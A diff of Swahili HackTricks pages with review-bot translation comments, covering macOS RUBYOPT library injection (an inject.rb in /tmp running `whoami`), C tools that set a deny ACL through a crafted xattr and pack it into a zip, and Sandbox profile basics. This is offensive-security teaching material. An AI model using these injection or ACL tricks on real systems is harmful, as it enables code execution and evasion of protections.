* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
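Review bot: L786 "Matumizi: [...]" is still a translated fragment of program output inside the same `<pre>` block where L785 correctly restores the untranslated "dylib hijacked in" log line; quoted output should stay as printed, i.e. "Usage: [...]". Separately, L790 "kuharibu ruhusa za kamera" ("destroy the camera permissions") reads oddly for abusing them; L789's "kudanganya" was closer.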

View file

@ -1,24 +1,25 @@
# Uingizaji wa Programu za Ruby kwenye macOS
# macOS Ruby Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## RUBYOPT
Kwa kutumia hii mazingira ya pembejeo, ni **inawezekana kuongeza vigezo vipya** kwa **ruby** wakati wowote inapotekelezwa. Ingawa kigezo **`-e`** hakiwezi kutumika kuainisha nambari ya ruby ya kutekeleza, inawezekana kutumia vigezo **`-I`** na **`-r`** kuongeza saraka mpya kwenye njia ya kupakia maktaba na kisha **kuainisha maktaba ya kupakia**.
Kwa kutumia hii env variable inawezekana **kuongeza params mpya** kwa **ruby** kila wakati inatekelezwa. Ingawa param **`-e`** haiwezi kutumika kubaini ruby code ya kutekeleza, inawezekana kutumia params **`-I`** na **`-r`** kuongeza folda mpya kwenye maktaba za kupakia na kisha **kubaini maktaba ya kupakia**.
Unda maktaba **`inject.rb`** kwenye **`/tmp`**:
Unda maktaba **`inject.rb`** katika **`/tmp`**:
{% code title="inject.rb" %}
```ruby
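Review bot: L841 "kuongeza folda mpya kwenye maktaba za kupakia" ("add new folders to the libraries to load") garbles what `-I` does; L840's "njia ya kupakia maktaba" ("library load path") is accurate, as the `RUBYOPT="-I/tmp -rinject"` invocation at L859 shows (`-I/tmp` adds the directory, `-rinject` names the library).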
@ -26,7 +27,7 @@ puts `whoami`
```
{% endcode %}
Tengeneza skripti ya ruby mahali popote kama:
Unda popote script ya ruby kama:
{% code title="hello.rb" %}
```ruby
@ -34,24 +35,25 @@ puts 'Hello, World!'
```
{% endcode %}
Kisha tengeneza skripti ya ruby isiyojulikana na uipakie kwa:
Kisha fanya script ya ruby isiyo na mpangilio iitwe na:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb
```
Ukweli wa kufurahisha, inafanya kazi hata na param **`--disable-rubyopt`**:
Fun fact, inafanya kazi hata na param **`--disable-rubyopt`**:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
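Review bot: L857 "script ya ruby isiyo na mpangilio" ("a disorderly ruby script") does not say what is meant; the sense is any ruby script, as L859 demonstrates with the hello.rb from L851, so "script yoyote ya ruby" fits. L862 also leaves "Fun fact" untranslated where L861 had "Ukweli wa kufurahisha".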

View file

@ -1,27 +1,33 @@
# macOS xattr-acls extra stuff
# macOS xattr-acls vitu vya ziada
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
\`\`\`bash rm -rf /tmp/test\* echo test >/tmp/test chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test ./get\_acls test ACL for test: !#acl 1 group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
{% endhint %}
```bash
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
./get_acls test
ACL for test:
!#acl 1
group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown
ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a
````
```
<details>
<summary>Kificho cha get_acls</summary>
<summary>Kanuni ya get_acls</summary>
```c
// gcc -o get_acls get_acls
#include <stdio.h>
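Review bot: the compile comment at L922, `gcc -o get_acls get_acls`, is missing the `.c` source suffix (compare `gcc -o set_xattr set_xattr.c` at L943); as written gcc would look for an input file named get_acls. Suggest `// gcc -o get_acls get_acls.c`. The re-fencing of the previously garbled block at L905 into L907-L915 is otherwise the right fix.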
@ -61,47 +67,103 @@ acl_free(acl);
acl_free(acl_text);
return 0;
}
````
\`\`\`bash # Lets add the xattr com.apple.xxx.xxxx with the acls mkdir start mkdir start/protected ./set\_xattr start/protected echo something > start/protected/something \`\`\`
```
</details>
```bash
# Lets add the xattr com.apple.xxx.xxxx with the acls
mkdir start
mkdir start/protected
./set_xattr start/protected
echo something > start/protected/something
```
<details>
<summary>Kodi ya set_xattr</summary>
<summary>Kanuni ya set_xattr</summary>
```c
// gcc -o set_xattr set_xattr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/xattr.h>
#include <sys/acl.h>
\`\`\`c // gcc -o set\_xattr set\_xattr.c #include #include #include #include #include
void print\_xattrs(const char \*filepath) { ssize\_t buflen = listxattr(filepath, NULL, 0, XATTR\_NOFOLLOW); if (buflen < 0) { perror("listxattr"); return; }
void print_xattrs(const char *filepath) {
ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW);
if (buflen < 0) {
perror("listxattr");
return;
}
char \*buf = malloc(buflen); if (buf == NULL) { perror("malloc"); return; }
char *buf = malloc(buflen);
if (buf == NULL) {
perror("malloc");
return;
}
buflen = listxattr(filepath, buf, buflen, XATTR\_NOFOLLOW); if (buflen < 0) { perror("listxattr"); free(buf); return; }
buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW);
if (buflen < 0) {
perror("listxattr");
free(buf);
return;
}
printf("All current extended attributes for %s:\n", filepath); for (char \*name = buf; name < buf + buflen; name += strlen(name) + 1) { printf("%s: ", name); ssize\_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR\_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); continue; }
printf("All current extended attributes for %s:\n", filepath);
for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) {
printf("%s: ", name);
ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW);
if (valuelen < 0) {
perror("getxattr");
continue;
}
char \*value = malloc(valuelen + 1); if (value == NULL) { perror("malloc"); continue; }
char *value = malloc(valuelen + 1);
if (value == NULL) {
perror("malloc");
continue;
}
valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR\_NOFOLLOW); if (valuelen < 0) { perror("getxattr"); free(value); continue; }
valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW);
if (valuelen < 0) {
perror("getxattr");
free(value);
continue;
}
value\[valuelen] = '\0'; // Null-terminate the value printf("%s\n", value); free(value); }
value[valuelen] = '\0'; // Null-terminate the value
printf("%s\n", value);
free(value);
}
free(buf); }
free(buf);
}
int main(int argc, char \*argv\[]) { if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv\[0]); return 1; }
const char \*hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a"; const char \*filepath = argv\[1];
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
return 1;
}
int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0); if (result == 0) { printf("Extended attribute set successfully.\n\n"); } else { perror("setxattr"); return 1; }
const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a";
const char *filepath = argv[1];
print\_xattrs(filepath);
int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0);
if (result == 0) {
printf("Extended attribute set successfully.\n\n");
} else {
perror("setxattr");
return 1;
}
return 0; }
print_xattrs(filepath);
````
return 0;
}
```
</details>
<div data-gb-custom-block data-tag="code" data-overflow='wrap'>
{% code overflow="wrap" %}
```bash
# Create appledoublefile with the xattr entitlement
ditto -c -k start protected.zip
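Review bot: L1008 embeds the ACL record as an undocumented hex literal; a one-line comment stating that it is the `!#acl 1` / `group:...:everyone:12:deny:write,...` text printed by get_acls at L912-L915 would tell readers what `setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0)` at L1011 actually writes, and that `strlen(hex)` is only valid because the literal contains no embedded NUL byte. The restored `<filepath>` in the usage string at L1004 (lost in L1000) is a good catch.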
@ -115,10 +177,24 @@ rm -rf protected.zip
zip -r protected.zip protected ._protected
rm -rf protected
rm ._*
````
```
{% endcode %}
```bash
# Check if it worked
ditto -x -k --rsrc protected.zip .
xattr -l protected
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
\`\`\`bash # Check if it worked ditto -x -k --rsrc protected.zip . xattr -l protected \`\`\`
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
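Review bot: L1043-L1044 and L1048-L1050 translate the "Learn & practice" / "Support HackTricks" block into Swahili, while the same block in this commit's other files is left in English (L671-L672, L800-L801, L823-L824, L1060-L1061); pick one form for the whole commit.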

View file

@ -1,35 +1,36 @@
# Sanduku la macOS
# macOS Sandbox
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Sanduku la MacOS (awali lililoitwa Seatbelt) **linapunguza matumizi** yanayoendesha ndani ya sanduku kwa **vitendo vilivyoidhinishwa vilivyoelezwa katika wasifu wa Sanduku** ambao programu inaendeshwa nao. Hii husaidia kuhakikisha kwamba **programu itakuwa ikifikia rasilimali zinazotarajiwa tu**.
MacOS Sandbox (awali ilijulikana kama Seatbelt) **inaweka mipaka kwa programu** zinazotembea ndani ya sandbox kwa **vitendo vilivyokubaliwa vilivyobainishwa katika profaili ya Sandbox** ambayo programu inatumia. Hii husaidia kuhakikisha kwamba **programu itakuwa ikipata rasilimali zinazotarajiwa tu**.
Programu yoyote yenye **haki** ya **`com.apple.security.app-sandbox`** itatekelezwa ndani ya sanduku. **Faili za Apple** kawaida hutekelezwa ndani ya Sanduku na ili kuchapisha kwenye **Duka la App**, **haki hii ni lazima**. Kwa hivyo, programu nyingi zitatekelezwa ndani ya sanduku.
Programu yoyote yenye **entitlement** **`com.apple.security.app-sandbox`** itatekelezwa ndani ya sandbox. **Mifumo ya Apple** kwa kawaida hutekelezwa ndani ya Sandbox na ili kuchapishwa ndani ya **App Store**, **entitlement hii ni ya lazima**. Hivyo, programu nyingi zitatekelezwa ndani ya sandbox.
Ili kudhibiti kile mchakato unaweza au hauwezi kufanya, **Sanduku lina kitanzi** katika **syscalls** zote kwenye kernel. **Kulingana** na **haki** za programu, Sanduku itaruhusu vitendo fulani.
Ili kudhibiti kile mchakato unaweza au hawezi kufanya, **Sandbox ina vidokezo** katika **syscalls** zote kupitia kernel. **Kulingana** na **entitlements** za programu, Sandbox it **aruhusu** vitendo fulani.
Baadhi ya sehemu muhimu za Sanduku ni:
Baadhi ya vipengele muhimu vya Sandbox ni:
* **Kernel extension** `/System/Library/Extensions/Sandbox.kext`
* **Framework binafsi** `/System/Library/PrivateFrameworks/AppSandbox.framework`
* **Daemon** inayotumia userland `/usr/libexec/sandboxd`
* **Makontena** `~/Library/Containers`
* **kiongezeo cha kernel** `/System/Library/Extensions/Sandbox.kext`
* **mfumo wa faragha** `/System/Library/PrivateFrameworks/AppSandbox.framework`
* **daemon** inayotembea katika userland `/usr/libexec/sandboxd`
* **mifuko** `~/Library/Containers`
Ndani ya folda za makontena unaweza kupata **folda kwa kila programu inayotekelezwa kwenye sanduku** na jina la kitambulisho cha mfuko:
Ndani ya folda ya mifuko unaweza kupata **folda kwa kila programu inayotekelezwa sandboxed** yenye jina la bundle id:
```bash
ls -l ~/Library/Containers
total 0
@ -40,7 +41,7 @@ drwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings
drwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler
[...]
```
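Review bot: the bold markup in the new syscall sentence splits a verb in two: `Sandbox it **aruhusu** vitendo fulani` should read `Sandbox **itaruhusu** vitendo fulani`, since `itaruhusu` is one word. In the same line `vidokezo` means 'tips', so `Sandbox ina vidokezo katika syscalls` no longer says that the Sandbox hooks the syscalls; keep `hooks` as a loanword or use a term for interception. The renamed component bullets also drift from the macOS names: `mfumo wa faragha` reads as 'privacy system' where the replaced `Framework binafsi` meant 'private framework', and `mifuko` ('bags') replaces `Makontena` for `~/Library/Containers`; keep `framework` and `Containers`/`Makontena`. The rewritten banner (`Learn & practice AWS Hacking`, `Support HackTricks`, `Check the subscription plans`, `Join the`, `Share hacking tricks`) is left in English on a page whose body is Swahili.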
Ndani ya kila folda ya kitambulisho cha mfuko unaweza kupata **plist** na **Data directory** ya App:
Ndani ya kila folda ya bundle id unaweza kupata **plist** na **Data directory** ya App:
```bash
cd /Users/username/Library/Containers/com.apple.Safari
ls -la
@ -64,7 +65,7 @@ drwx------ 2 username staff 64 Mar 24 18:02 SystemData
drwx------ 2 username staff 64 Mar 24 18:02 tmp
```
{% hint style="danger" %}
Tafadhali kumbuka kwamba hata kama viungo vya ishara vipo hapo ili "kutoroka" kutoka kwenye Sanduku la Mchanga na kupata ufikiaji wa folda zingine, Programu bado inahitaji **kuwa na ruhusa** ya kuzifikia. Ruhusa hizi zipo ndani ya **`.plist`**.
Kumbuka kwamba hata kama symlinks zipo ili "kutoroka" kutoka Sandbox na kufikia folda nyingine, App bado inahitaji **kuwa na ruhusa** za kuzifikia. Ruhusa hizi ziko ndani ya **`.plist`**.
{% endhint %}
```bash
# Get permissions
@ -114,12 +115,12 @@ AAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf...
[...]
```
{% hint style="warning" %}
Kila kitu kilichoundwa/kibadilishwa na programu iliyowekwa kwenye Sandboksi kitapata sifa ya **karantini**. Hii itazuia nafasi ya sandboksi kwa kuzindua Gatekeeper ikiwa programu ya sandboksi inajaribu kutekeleza kitu na **`open`**.
Kila kitu kilichoundwa/kilibadilishwa na programu ya Sandboxed kitapata **sifa ya karantini**. Hii itazuia nafasi ya sandbox kwa kuanzisha Gatekeeper ikiwa programu ya sandbox inajaribu kutekeleza kitu kwa **`open`**.
{% endhint %}
### Profaili za Sandboksi
### Profaili za Sandbox
Profaili za Sandboksi ni faili za usanidi ambazo zinaonyesha ni nini kitakachoruhusiwa/kukatazwa katika **Sandboksi** hiyo. Inatumia Lugha ya Profaili ya Sandboksi (SBPL), ambayo hutumia lugha ya programu ya [**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\)).
Profaili za Sandbox ni faili za usanidi zinazoonyesha kile kitakachokuwa **kuruhusiwa/kukatazwa** katika hiyo **Sandbox**. Inatumia **Sandbox Profile Language (SBPL)**, ambayo inatumia lugha ya programu ya [**Scheme**](https://en.wikipedia.org/wiki/Scheme\_\(programming\_language\)).
Hapa unaweza kupata mfano:
```scheme
@ -140,37 +141,28 @@ Hapa unaweza kupata mfano:
)
```
{% hint style="success" %}
Angalia [**utafiti**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **ili kuangalia hatua zaidi ambazo zinaweza kuruhusiwa au kukataliwa.**
Check this [**research**](https://reverse.put.as/2011/09/14/apple-sandbox-guide-v1-0/) **ili kuangalia vitendo zaidi ambavyo vinaweza kuruhusiwa au kukataliwa.**
{% endhint %}
**Huduma muhimu za mfumo** pia zinaendeshwa ndani ya **sandbox yao ya kawaida** kama huduma ya `mdnsresponder`. Unaweza kuona maelezo ya **sandbox maalum** haya ndani ya:
Mifumo muhimu ya **huduma** pia inafanya kazi ndani ya **sandbox** yake maalum kama huduma ya `mdnsresponder`. Unaweza kuona hizi **profiles za sandbox** maalum ndani ya:
* **`/usr/share/sandbox`**
* **`/System/Library/Sandbox/Profiles`**&#x20;
* Maelezo mengine ya sandbox yanaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
* Profiles nyingine za sandbox zinaweza kuangaliwa katika [https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles](https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles).
Programu za **Duka la App** hutumia **maelezo ya sandbox** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika maelezo haya jinsi idhini kama vile **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
Programu za **App Store** zinatumia **profile** **`/System/Library/Sandbox/Profiles/application.sb`**. Unaweza kuangalia katika profile hii jinsi haki kama **`com.apple.security.network.server`** inavyoruhusu mchakato kutumia mtandao.
SIP ni maelezo ya sandbox yanayoitwa platform\_profile katika /System/Library/Sandbox/rootless.conf
SIP ni profile ya Sandbox inayoitwa platform\_profile katika /System/Library/Sandbox/rootless.conf
### Mifano ya Maelezo ya Sandbox
### Mifano ya Profile ya Sandbox
Ili kuanza programu na **maelezo ya sandbox maalum**, unaweza kutumia:
Ili kuanzisha programu na **profile maalum ya sandbox** unaweza kutumia:
```bash
sandbox-exec -f example.sb /Path/To/The/Application
```
{% tabs %}
{% tab title="touch" %}
